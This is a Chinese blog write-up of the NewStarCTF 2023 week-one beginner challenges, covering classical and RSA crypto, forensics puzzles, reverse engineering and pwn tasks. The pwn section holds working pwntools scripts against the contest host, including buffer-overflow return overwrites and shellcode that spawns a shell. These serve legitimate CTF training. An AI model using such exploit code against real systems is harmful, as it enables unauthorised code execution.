[NewStarCTF 2023 公开赛道] week1

最近没什么正式比赛，都是入门赛，有moectf,newstar,SHCTF,0xGame都是漫长的比赛。一周一堆制。

这周newstar第1周结束了，据说py得很厉害，第2周延期了，什么时候开始还不一定，不过第一周已经结束提交了，可以发上来存下。总体来说没难题。

 Crypto

brainfuck

++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.

直接到网站解密 Brainfuck/OoK加密解密 - Bugku CTF

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Caesar's Secert

kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed} 

随波逐流工具一键解密

 key1 #5: flag{ca3s4rs_c1pher_i5_v4ry_3azy}

Fence

 fa{ereigtepanet6680}lgrodrn_h_litx#8fc3

同样随波，W栅栏

flag{reordering_the_plaintext#686f8c03} 

Vigenère

 pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}

试密钥，逐个字母试，使头为flag，也可以从 vigenere的表上查

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0} 

babyencoding

 flag由3段组成，第1段是base64,第2段是base32，第3段是uuencode

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T` 

不过这个uuencode需要在 在线UUencode编码|在线UUencode解码|UU编码|UU解码|UUencode编码原理介绍--查错网 

上解码，随波上后部是乱码

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

babyrsa

n是由一堆小素数组成，可以直接分解

from Crypto.Util.number import *
from flag import flagdef gen_prime(n):res = 1for i in range(15):res *= getPrime(n)return resif __name__ == '__main__':n = gen_prime(32)e = 65537m = bytes_to_long(flag)c = pow(m,e,n)print(n)print(c)
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

在sage上直接得到phi

phi = euler_phi(n)
d = inverse_mod(0x10001, phi)
m = pow(c,d,n)
l2b(int(m))
b'flag{us4_s1ge_t0_cal_phI}'

Small d

d很小，直接用winer

from secret import flag
from Crypto.Util.number import *p = getPrime(1024)
q = getPrime(1024)d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)c = pow(m,e,n)print(c)
print(e)
print(n)c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433

#sage
from Crypto.Util.number import long_to_bytes,bytes_to_long
def transform(x,y):res = []while y:res.append(x//y)x,y = y,x%yreturn resdef continued_fraction(res):numerator,denominator = 1,0for i in res[::-1]:denominator,numerator = numerator,i*numerator+denominatorreturn numerator,denominatordef wiener_attack(c,res,n):print("Attack start...")for i in range(1,len(res)):ress = res[:i]d = continued_fraction(ress)[1]m = long_to_bytes(int(pow(c,d,n)))#if all(0x20<=k<=0x7f for k in m):if b'flag{' in m:print(m)breakres = transform(e,n)
wiener_attack(c,res,n)#Attack start...
#b'flag{learn_some_continued_fraction_technique#dc16885c}'

babyxor

1字节异或加密，直接爆破

from secret import *ciphertext = []for f in flag:ciphertext.append(f ^ key)print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2

enc = bytes.fromhex('e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
for i in range(256):tmp = bytes([i^v for v in enc])if b'flag' in tmp:print(tmp)#flag{x0r_15_symm3try_and_e4zy!!!!!!}

Affine

仿射密码

from flag import flag, keymodulus = 256ciphertext = []for f in flag:ciphertext.append((key[0]*f + key[1]) % modulus)print(bytes(ciphertext).hex())# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064

因为两个key都很小，可以直接用flag{头爆破出来

enc = bytes.fromhex('dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
for i in range(256):for j in range(256):if bytes([(i*v+j)%256 for v in b'flag{']) == enc[:5]:print(i,j)a,b = 17,23 
flag = ''
for i in range(len(enc)):for k in range(0x21,0x7f):if (a*k + b)%256 == enc[i]:flag += chr(k)break print(flag)
#flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *def pad(data):return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])def main():flag_ = pad(flag)key = os.urandom(16) * 2iv = os.urandom(16)print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)aes = AES.new(key, AES.MODE_CBC, iv)enc_flag = aes.encrypt(flag_)print(enc_flag)if __name__ == "__main__":main()

key有16*2字节，iv只有16字节，前部爆露，可以得到key和iv然后直接解密

hint = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
key = long_to_bytes(hint^1)[:16]*2
iv = long_to_bytes(hint^1^bytes_to_long(key))aes = AES.new(key, AES.MODE_CBC, iv)
aes.decrypt(enc)
#b'firsT_cry_Aes\x00\x00\x00'
#flag{firsT_cry_Aes}

MISC

CyberChef's Secret

怀疑这是crypto过来的

M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=

直接叫厨子

 

机密图片

 一个图片是个二维码，显然不是flag，用StegSolver

流量！鲨鱼！ 

流量题，用wireshark打开，可以看到好多 http访问，接协议排序找到可疑项

追踪http流得到密文

Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

上厨子，点魔术棒两次

压缩包们 

附件用010打开，发现是zip文件少头，改头为504b0304，后部有base64的提示

 解出提示是

I like six-digit numbers because they are very concise and easy to remember.

就是说6位数字密码，爆破6位数字，爆破报错，说明压缩包密码方式有误，用010修改下把0改为0

然后爆破密码，得到flag

 

空白格 

压缩包打开是个由空格和tab组成的空白文件，把空格换成0，tab换成1，每行只取后8字符（这里中间还都插着个1不知怎么出来的）

a = open('white.txt').readlines()
flag = ''
for v in a:v = v[:-1].replace(' ', '0').replace('\t', '1')flag += chr(int(v[-8:],2))print(flag.replace(chr(1),''))

隐秘的眼睛

显然是提到眼睛就是silenteye

PWN

ret2text 

read有溢出，直接写后门

from pwn import *p = remote('node4.buuoj.cn',29584)
context.log_level = 'debug'p.sendlineafter(b"Show me your magic", b'\x00'*0x28 + p64(0x4011fb))
print(p.sendline(b'cat flag'))
p.interactive()

 ezshellcode

建了个可写可执行的块把shellcode读进去然后执行

from pwn import *p = remote('node4.buuoj.cn',29612)
context(arch='amd64', log_level = 'debug')p.sendlineafter(b"Show me your magic", asm(shellcraft.sh()))
print(p.sendline(b'cat flag'))
p.interactive()

 newstar shop

这题主要是看代码，

一共有100块，买gift花40两次，再运行3 减50变成负数，再买flag即可

输入：1，2，1，2，3，1，3

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{int v3; // [rsp+4h] [rbp-Ch] BYREFunsigned __int64 v4; // [rsp+8h] [rbp-8h]v4 = __readfsqword(0x28u);init();while ( 1 ){menu();if ( (int)__isoc99_scanf("%d", &v3) <= 0 )puts("Invalid input");switch ( v3 ){case 1:shop();break;case 2:makemoney();break;case 3:dont_try();break;default:puts("nothing here");puts("\n");break;}}
}
unsigned __int64 shop()
{int v1; // [rsp+4h] [rbp-Ch] BYREFunsigned __int64 v2; // [rsp+8h] [rbp-8h]v2 = __readfsqword(0x28u);puts("=============================");puts("===Welcome to newstar shop===");puts("=============================");puts("1.newstar's gift          20$");puts("2.pwn write up            40$");puts("3.shell                 9999$");puts("\n");puts("All things are only available for one day!");puts("What do you want to buy?");puts("\n");if ( (int)__isoc99_scanf("%d", &v1) <= 0 )puts("Invalid input");if ( v1 != 3 ){if ( v1 > 3 ){
LABEL_17:puts("nothing here");puts("\n");return v2 - __readfsqword(0x28u);}if ( v1 == 1 ){if ( (unsigned int)money > 0x13 ){money -= 20;puts("You buy a newstar's gift");puts("That is the gift:");puts("What will happen when int transfer to unsigned int?");goto LABEL_10;}}else{if ( v1 != 2 )goto LABEL_17;if ( (unsigned int)money > 0x27 ){money -= 40;puts("You buy a pwn write up");puts("That is free after the match,haha");goto LABEL_10;}}puts("Sorry,you don't have enough money");
LABEL_10:puts("\n");return v2 - __readfsqword(0x28u);}if ( (unsigned int)money > 0x270E ){money = 0;puts("How do you buy it?");puts("\n");system("/bin/sh");}else{puts("Sorry,you don't have enough money");puts("\n");}return v2 - __readfsqword(0x28u);
}

p1eee

跟前边第1题类似，read有溢出还有后门，不过后门没直接给出

ssize_t sub_120E()
{__int64 buf[4]; // [rsp+0h] [rbp-20h] BYREFmemset(buf, 0, sizeof(buf));puts("A nice try to break pie!!!");return read(0, buf, 0x29uLL);
}

后门

from pwn import *p = remote('node4.buuoj.cn',25970)
context(arch='amd64', log_level = 'debug')p.sendafter(b"A nice try to break pie!!!", b'\x00'*0x28 + p8(0x6c))
print(p.sendline(b'cat flag'))
p.interactive()

 Random

猜对一个数即可

int __cdecl main(int argc, const char **argv, const char **envp)
{char v3; // blint v4; // eaxint v6; // [rsp+4h] [rbp-2Ch] BYREFunsigned int seed; // [rsp+8h] [rbp-28h]int v8; // [rsp+Ch] [rbp-24h]_BYTE v9[5]; // [rsp+13h] [rbp-1Dh] BYREFunsigned __int64 v10; // [rsp+18h] [rbp-18h]v10 = __readfsqword(0x28u);init(argc, argv, envp);seed = time(0LL);srand(seed);v8 = rand();puts("can you guess the number?");__isoc99_scanf("%d", &v6);if ( v8 == v6 ){qmemcpy(v9, "2$031", sizeof(v9));v3 = v9[rand() % 5];v4 = rand();sy(v9[v4 % 2], v3);}else{printf("%s", "Haha you are wrong");}return 0;
}

用ctypes库猜一个数

from ctypes import *
from pwn import *clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")p = remote('node4.buuoj.cn',26584)
context(arch='amd64', log_level = 'debug')clibc.srand(clibc.time(0))
v =clibc.rand()p.sendlineafter(b"can you guess the number?", str(v).encode())p.sendline(b'/bin/sh')
p.sendline(b'cat flag')p.interactive()

REVERSE

easy_RE

IDA一打开就看到一半

再反编译又是一半

 咳

加密方法就是加1

>>> a = b'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
>>> bytes([v-1 for v in a])
b'flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}'

 Segments

根据题目名字查看段

ELF

 第二步是base64

int __cdecl main(int argc, const char **argv, const char **envp)
{int v3; // edxchar *s1; // [rsp+0h] [rbp-20h]char *v6; // [rsp+8h] [rbp-18h]char *s; // [rsp+10h] [rbp-10h]s = (char *)malloc(0x64uLL);printf("Input flag: ");fgets(s, 100, stdin);s[strcspn(s, "\n")] = 0;v6 = encode(s);v3 = strlen(v6);s1 = base64_encode((__int64)v6, v3);if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )puts("Correct");elseputs("Wrong");free(v6);free(s1);free(s);return 0;
}

第1步encode是与0x20异或

_BYTE *__fastcall encode(const char *a1)
{size_t v1; // raxint v2; // eax_BYTE *v4; // [rsp+20h] [rbp-20h]int i; // [rsp+28h] [rbp-18h]int v6; // [rsp+2Ch] [rbp-14h]v1 = strlen(a1);v4 = malloc(2 * v1 + 1);v6 = 0;for ( i = 0; i < strlen(a1); ++i ){v2 = v6++;v4[v2] = (a1[i] ^ 0x20) + 16;}v4[v6] = 0;return v4;
}

a = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
b = b64decode(a)
bytes([(v-16)^0x20 for v in b])
b'flag{D0_4ou_7now_wha7_ELF_1s?}'

Endian

这是大端小端的意思

int __cdecl main(int argc, const char **argv, const char **envp)
{int i; // [rsp+4h] [rbp-3Ch]char *v5; // [rsp+8h] [rbp-38h]char v6[40]; // [rsp+10h] [rbp-30h] BYREFunsigned __int64 v7; // [rsp+38h] [rbp-8h]v7 = __readfsqword(0x28u);puts("please input your flag");__isoc99_scanf("%s", v6);v5 = v6;for ( i = 0; i <= 4; ++i ){if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) ){printf("wrong!");exit(0);}v5 += 4;}printf("you are right");return 0;
}

加密只是作了个异或

>>> enc = [0x75553A1E, 0x7B583A03, 0x4D58220C, 0x7B50383D, 0x736B3819]
>>> a = [0x12345678 ^ v for v in enc]
>>>
>>> a
[1734437990, 1768713339, 1600943220, 1768189509, 1633644129]
>>> long_to_bytes(a[0])
b'galf'
>>> from pwn import p32
>>> b''.join(p32(v) for v in a)
b'flag{llittl_Endian_a'
>>>

AndroXor

用jadx打开，可以看到密文，key（异或）

public class MainActivity extends AppCompatActivity {private ActivityMainBinding binding;static {System.loadLibrary("androxor");}public String Xor(String str, String str2) {char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};char[] cArr2 = new char[str.length()];String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";for (int i = 0; i < str.length(); i++) {char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));cArr2[i] = charAt;if (cArr[i] != charAt) {return "wrong!!!";}}return str3;}/* JADX INFO: Access modifiers changed from: protected */@Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activitypublic void onCreate(Bundle bundle) {super.onCreate(bundle);ActivityMainBinding inflate = ActivityMainBinding.inflate(getLayoutInflater());this.binding = inflate;setContentView(inflate.getRoot());final EditText editText = (EditText) findViewById(R.id.password);((Button) findViewById(R.id.button)).setOnClickListener(new View.OnClickListener() { // from class: com.chick.androxor.MainActivity.1@Override // android.view.View.OnClickListenerpublic void onClick(View view) {String obj = editText.getText().toString();MainActivity mainActivity = MainActivity.this;Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();Log.d("输入", editText.getText().toString());}});}
}

c = [14,ord('\r'), 17, 23, 2, ord('K'), ord('I'), ord('7'), ord(' '), 30, 20, ord('I'), ord('\n'), 2, ord('\f'), ord('>'), ord('('), ord('@'), 11, ord('\''), ord('K'), ord('Y'), 25, ord('A'), ord('\r')]
key = b'happyx3'xor(bytes(c),key)
#flag{3z_And0r1d_X0r_x1x1}

EzPE

又是下异或，这是第1个字符是序号和第2个异或

enc = bytes.fromhex('0A0C041F266C432D3C0C544C24251106053A7C51381A030D01361F122604685D3F2D372A7D')
flag = 'f'
for i in range(len(enc)):for k in range(0x20,0x7f):if ord(flag[i])^k^i == enc[i]:flag += chr(k)break 
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

 lazy_activtiy

又是个APK文件，从程序里看点击够10000就出flag

这里的editText就是flag

打开layout，找到用户定义的资源